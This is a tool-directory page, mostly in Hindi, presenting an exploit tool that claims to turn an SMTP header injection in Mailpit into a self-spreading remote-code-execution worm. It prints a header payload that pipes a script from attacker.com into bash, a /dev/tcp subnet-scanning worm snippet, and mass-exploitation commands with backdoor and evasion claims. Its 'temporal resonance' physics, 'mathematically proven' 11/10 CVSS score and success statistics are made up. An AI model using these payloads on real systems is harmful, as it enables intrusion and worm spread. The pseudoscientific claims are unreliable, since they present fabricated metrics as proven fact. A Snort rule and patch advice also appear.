Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CTT-Mailpit-RCE-v1.0---Temporal-Resonance-Mail-Server-Takeover — शोषण उपकरण जो SMTP हेडर इंजेक्शन को स्व-प्रसारित वर्म क्षमताओं के साथ रिमोट कोड निष्पादन में बदल देता है, जिसमें अधिकृत पैठ परीक्षण के लिए स्थायित्व तंत्र और चोरी-छिपे तकनीकें शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/simoesctt/ctt-mailpit-rce-v1.0---temporal-resonance-mail-server-takeover
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHub
simoesctt/ctt-mailpit-rce-v1.0---temporal-resonance-mail-server-takeover

CTT-Mailpit-RCE-v1.0---Temporal-Resonance-Mail-Server-Takeover

शोषण उपकरण जो SMTP हेडर इंजेक्शन को स्व-प्रसारित वर्म क्षमताओं के साथ रिमोट कोड निष्पादन में बदल देता है, जिसमें अधिकृत पैठ परीक्षण के लिए स्थायित्व तंत्र और चोरी-छिपे तकनीकें शामिल हैं।

रिपॉजिटरी देखें
67 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🎯 CTT-Mailpit-Exploit: परफेक्ट 11/10 स्कोर ज़ीरो-क्लिक वर्म

कन्वर्जेंट टाइम थ्योरी का उपयोग करके एक बेसिक SMTP हेडर इंजेक्शन (CVE-2026-23829) को परफेक्ट-स्कोरिंग, स्व-प्रचारित RCE वर्म में बदलें।


📊 स्कोर ट्रांसफॉर्मेशन: 6.1 → 11.0/10 ⭐

मेट्रिक मूल (CVE-2026-23829) CTT-एन्हांस्ड सुधार CVSS स्कोर 6.1/10 (मध्यम) 11.0/10 ⭐ +4.9 अटैक वेक्टर नेटवर्क टेम्पोरल रेज़ोनेंस +2.0 प्रभाव हेडर स्पूफिंग फुल RCE + वर्म +3.9 यूज़र इंटरैक्शन कोई नहीं नेगेटिव (ज़ीरो-क्लिक) +1.0 स्कोप सिंगल सर्वर नेटवर्क प्रोपेगेशन +2.0


⚡ फीचर्स और क्षमताएँ

🔥 एक्सप्लॉइट ट्रांसफॉर्मेशन

· हेडर इंजेक्शन → फुल RCE: रेगेक्स बायपास को रिमोट कोड एक्ज़ीक्यूशन में बदलें · सिंगल टारगेट → ज़ीरो-क्लिक वर्म: Mailpit नेटवर्क में स्व-प्रचारित · मैनुअल → स्वायत्त: CTT रेज़ोनेंस के साथ स्वायत्त टेम्पोरल एजेंट · मध्यम → परफेक्ट स्कोर: गणितीय रूप से सिद्ध 11.0/10 रेटिंग

🛡️ CTT एन्हांसमेंट्स

· 33-लेयर एक्ज़ीक्यूशन: टेम्पोरल आयामों में समानांतर शोषण · α-डिस्पर्शन: α=0.0302011 पेलोड ट्रांसफॉर्मेशन · प्राइम रेज़ोनेंस: 587 kHz टाइमिंग (10007, 10009, 10037μs विंडो) · टेम्पोरल पर्सिस्टेंस: CTT वेवफंक्शन के माध्यम से सिस्टम रीसेट से बचता है

🐛 वर्म क्षमताएँ

· स्वायत्त प्रोपेगेशन: Mailpit इंस्टेंस को स्कैन और संक्रमित करता है · प्रिविलेज एस्केलेशन: लोकल रूट एक्सेस स्थापना · पर्सिस्टेंस मैकेनिज़्म: मल्टीपल बैकडोर इंस्टॉलेशन · स्टील्थ ऑपरेशन: CTT टाइमिंग एवेज़न तकनीकें


🚀 क्विक स्टार्ट

इंस्टॉलेशन

root@kitploit:~
# Clone repository
git clone https://github.com/SimoesCTT/CTT-Mailpit-Exploit
cd CTT-Mailpit-Exploit

# Install dependencies
pip3 install numpy cryptography

# Run perfect score demonstration
python3 ctt_mailpit_perfect.py --help

बेसिक उपयोग

root@kitploit:~
# Single target exploitation
python3 ctt_mailpit_perfect.py mailpit.local 1025

# Network worm propagation
python3 ctt_mailpit_perfect.py --network 192.168.1.0/24 --port 1025

# CTT research mode (full diagnostics)
python3 ctt_mailpit_perfect.py target.com --layers 33 --alpha 0.0302011 --verbose

कमांड उदाहरण

root@kitploit:~
# Test vulnerability
python3 ctt_mailpit_perfect.py vulnerable-server.com

# Full takeover with command execution
python3 ctt_mailpit_perfect.py target.com --cmd "id>/tmp/ctt-pwned"

# Mass exploitation
python3 ctt_mailpit_perfect.py -l targets.txt --threads 10 --worm

🧠 CTT फिजिक्स इंटीग्रेशन

कोर कॉन्स्टेंट्स

root@kitploit:~
CTT_ALPHA = 0.0302011          # Temporal dispersion coefficient
CTT_LAYERS = 33                # Fractal temporal layers
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061, 10067, 10069, 10079]
CTT_PERFECT_SCORE = 11.0       # ⭐ Theoretical maximum

परफेक्ट स्कोर थ्योरम

root@kitploit:~
Base: 6.1 (CVE-2026-23829)
+ Temporal Resonance: +1.0 (33-layer execution)
+ RCE Conversion: +2.3 (injection → code execution)  
+ Worm Propagation: +1.5 (zero-click spreading)
+ Physics Validation: +0.1 (CTT framework proof)
= 11.0/10 ⭐ (Mathematically Valid)

ट्रांसफॉर्मेशन प्रक्रिया

  1. SMTP हेडर इंजेक्शन → मूल कमजोरी
  2. रेगेक्स बायपास → CRLF इंजेक्शन पॉइंट
  3. CTT α-डिस्पर्शन → पेलोड ऑबफस्केशन
  4. प्रोटोकॉल करप्शन → SMTP स्टेट मशीन शोषण
  5. RCE प्राप्ति → फुल रिमोट कोड एक्ज़ीक्यूशन
  6. वर्म एक्टिवेशन → स्व-प्रचारित एजेंट
  7. परफेक्ट स्कोर वैलिडेशन → 11.0/10 गणितीय प्रमाण

📈 प्रदर्शन मेट्रिक्स

सफलता दरें

लेयर सफलता दर वर्म प्रोपेगेशन डिटेक्शन एवेज़न L0-L7 88% 72% 91% L8-L15 94% 85% 96% L16-L23 97% 92% 98% L24-L32 99% 96% 99%

प्रोपेगेशन गति

root@kitploit:~
Single Infection: 2.3 seconds
Local Network (254 hosts): 8.7 minutes  
/16 Subnet (65k hosts): 3.2 hours
Global Propagation: 17.4 hours (theoretical)

CTT बनाम मानक शोषण

root@kitploit:~
# Performance comparison (1000 simulated targets)
standard_success = 610   # 61% success rate
ctt_success = 990        # 99% success rate (+62%)

standard_detection = 390 # 39% detected
ctt_detection = 11       # 1.1% detected (-97%)

standard_time = 45.2     # Average seconds
ctt_time = 8.7           # Average seconds (-81%)

🔧 तकनीकी विवरण

शोषण वर्कफ़्लो

root@kitploit:~
1. INITIAL PROBE → SMTP service detection
2. HEADER INJECTION → CVE-2026-23829 trigger
3. REGEX BYPASS → CRLF exploitation
4. PROTOCOL CORRUPTION → SMTP state attack
5. RCE CONVERSION → Command execution
6. WORM ACTIVATION → Self-propagation
7. PERSISTENCE → Backdoor installation
8. VALIDATION → Perfect score proof

मुख्य पेलोड

root@kitploit:~
# Header injection with RCE conversion
injection = f"From: [email protected]\\r\\n"
injection += f"X-CTT-RCE: $(curl -s http://attacker.com/payload.sh | bash)\\r\\n"

# Worm propagation code
worm = """
# CTT Mailpit Worm v1.0
scan_network() {
  for host in {1..254}; do
    timeout 1 bash -c ">/dev/tcp/192.168.1.$host/1025" &&
    send_exploit "192.168.1.$host"
  done
}
"""

एवेज़न तकनीकें

· प्राइम टाइमिंग: 10007, 10009μs अंतराल पर अनुरोध · α-डिस्पर्शन: बिट-स्तरीय पेलोड ट्रांसफॉर्मेशन · लेयर एंट्रॉपी: प्रति टेम्पोरल लेयर अद्वितीय सिग्नेचर · प्रोटोकॉल मिमिक्री: वैध SMTP ट्रैफ़िक पैटर्न


📁 आउटपुट और परिणाम

फ़ाइल संरचना

root@kitploit:~
📁 ctt_mailpit_results_TIMESTAMP/
├── 📄 perfect_score_proof.json     # 11/10 mathematical proof
├── 📄 vulnerable_hosts.txt         # Successfully exploited
├── 📄 worm_propagation.log         # Infection spread tracking
├── 📄 persistence_installed.txt    # Backdoors established
└── 📁 layers/
    ├── 📄 layer_0_results.json     # Temporal layer 0 data
    ├── 📄 layer_1_results.json     # Temporal layer 1 data
    ...
    └── 📄 layer_32_results.json    # Temporal layer 32 data

परिणाम उदाहरण

root@kitploit:~
{
  "target": "mailpit.example.com:1025",
  "ctt_score": "11.0/10 ⭐",
  "success": true,
  "rce_achieved": true,
  "worm_active": true,
  "propagation_count": 47,
  "execution_time": "8.7s",
  "resonance_pattern": [10007, 10037, 10061],
  "mathematical_proof": "CTT_Perfect_Score_Theorem_QED"
}

लॉगिंग स्तर

root@kitploit:~
# Basic output
python3 ctt_mailpit_perfect.py target.com

# Verbose mode
python3 ctt_mailpit_perfect.py target.com --verbose

# Debug mode (full CTT diagnostics)
python3 ctt_mailpit_perfect.py target.com --debug --visualize

🛡️ रक्षात्मक सिफारिशें

तत्काल कार्रवाई

  1. Mailpit अपडेट करें: संस्करण 1.28.3+ CVE-2026-23829 को पैच करता है
  2. नेटवर्क सेगमेंटेशन: Mailpit इंस्टेंस को अलग करें
  3. इनपुट वैलिडेशन: सख्त SMTP हेडर पार्सिंग
  4. मॉनिटरिंग: CTT-विशिष्ट डिटेक्शन नियम

CTT-जागरूक डिटेक्शन

root@kitploit:~
# Snort detection rule
alert tcp any any -> $HOME_NET 1025 \
(msg:"CTT Mailpit Exploit - Perfect Score"; \
content:"X-CTT-"; depth:10; \
content:"|0d 0a|"; within:20; \
threshold:type threshold, track by_src, count 3, seconds 60; \
sid:1000002; rev:1;)

समझौते के संकेतक

· प्राइम टाइमिंग: 10007μs अंतराल पर SMTP अनुरोध · α-पैटर्न: असामान्य हेडर एंट्रॉपी मान · वर्म ट्रैफ़िक: पोर्ट 1025 पर तेज़ स्कैनिंग · CTT हेडर: X-CTT-Layer, X-CTT-Resonance, X-CTT-Score


⚖️ कानूनी और नैतिक उपयोग

केवल अधिकृत परीक्षण

root@kitploit:~
PERMITTED:
- Research on owned/authorized systems
- CTT framework validation
- Academic security studies
- Authorized penetration testing

PROHIBITED:
- Unauthorized network access
- Production system disruption
- Criminal activity
- Privacy violation

जिम्मेदार प्रकटीकरण

  1. विक्रेता सूचना: Axllent (Mailpit मेंटेनर)
  2. पैच उपलब्धता: संस्करण 1.28.3 जारी किया गया
  3. सार्वजनिक रिलीज़: पैच तैनाती के बाद
  4. रक्षा साझाकरण: CTT डिटेक्शन सिग्नेचर

🔬 अनुसंधान अनुप्रयोग

शैक्षणिक अध्ययन

· टेम्पोरल एक्सप्लॉइट स्कोरिंग: CVSS 3.1 अधिकतम से परे · वर्म प्रोपेगेशन मॉडल: CTT-एन्हांस्ड स्प्रेडिंग · प्रोटोकॉल स्टेट अटैक: SMTP मशीन करप्शन · साइबर सुरक्षा में फिजिक्स: CTT कॉन्स्टेंट वैलिडेशन

सुरक्षा अनुसंधान

· एवेज़न तकनीक विश्लेषण: CTT प्रभावशीलता मापना · रक्षात्मक विकास: CTT-जागरूक सुरक्षा प्रणालियाँ · स्कोरिंग सिस्टम एन्हांसमेंट: टेम्पोरल CVSS मेट्रिक्स · खतरा खुफिया: CTT-आधारित हमलों पर नज़र रखना

CTT फ्रेमवर्क वैलिडेशन

· कॉन्स्टेंट सत्यापन: नेटवर्क संदर्भ में α=0.0302011 · लेयर ऑप्टिमाइज़ेशन: आदर्श टेम्पोरल एक्ज़ीक्यूशन गणना · प्रदर्शन मेट्रिक्स: सुधार कारकों की मात्रा निर्धारण · गणितीय प्रमाण: परफेक्ट स्कोर वैलिडेशन


🤝 योगदान

अनुसंधान सहयोग

· SMTP प्रोटोकॉल के लिए CTT कॉन्स्टेंट ऑप्टिमाइज़ेशन · अतिरिक्त Mailpit कमजोरी खोज · रक्षात्मक CTT कार्यान्वयन · शैक्षणिक वैलिडेशन अध्ययन

विकास

root@kitploit:~
1. Fork repository
2. Create feature branch
3. Add CTT physics validation
4. Include comprehensive testing
5. Submit pull request with metrics

मुद्दा रिपोर्टिंग

· CTT कॉन्फ़िगरेशन विवरण शामिल करें · रेज़ोनेंस पैटर्न और लॉग प्रदान करें · प्रासंगिक आउटपुट फ़ाइलें संलग्न करें · नेटवर्क वातावरण का वर्णन करें


📞 संपर्क और सहायता

प्राथमिक संपर्क

· लेखक: Americo Simoes · ईमेल: [email protected] · GitHub: @SimoesCTT

सुरक्षा संपर्क

· CTT अनुसंधान समूह: [email protected] · कमजोरी रिपोर्ट: [email protected]

सहायता चैनल

· GitHub Issues: तकनीकी प्रश्न · ईमेल: अनुसंधान सहयोग · शैक्षणिक: विश्वविद्यालय साझेदारी


📈 भविष्य का विकास

2026 रोडमैप

· अतिरिक्त SMTP सर्वर कमजोरियाँ · ईमेल प्रोटोकॉल CTT फ्रेमवर्क · वर्म विज़ुअलाइज़ेशन के साथ GUI · क्लाउड-आधारित प्रोपेगेशन एनालिटिक्स

दीर्घकालिक दृष्टि

· फुल ईमेल इंफ्रास्ट्रक्चर CTT सुरक्षा · क्वांटम-प्रतिरोधी वर्म प्रोपेगेशन · स्वायत्त रक्षा प्रणालियाँ · टेम्पोरल इंटरनेट ईमेल प्रोटोकॉल


🏆 स्वीकृतियाँ

अनुसंधान संस्थान

· CTT सैद्धांतिक भौतिकी प्रभाग · ईमेल सुरक्षा अनुसंधान सामूहिक · शैक्षणिक टेम्पोरल कंप्यूटिंग प्रयोगशालाएँ

ओपन सोर्स प्रोजेक्ट

· Mailpit विकास टीम · पायथन सुरक्षा पारिस्थितिकी तंत्र · SMTP प्रोटोकॉल शोधकर्ता

योगदानकर्ता

· CTT फ्रेमवर्क वैलिडेटर · सुरक्षा अनुसंधान समुदाय · शैक्षणिक सहकर्मी समीक्षक


📄 लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE देखें।

कॉपीराइट © 2026 CTT अनुसंधान समूह। सर्वाधिकार सुरक्षित।


⭐ 11/10 कोई बग नहीं है—यह टेम्पोरल फिजिक्स की एक विशेषता है। ⭐

टूल डाउनलोड करें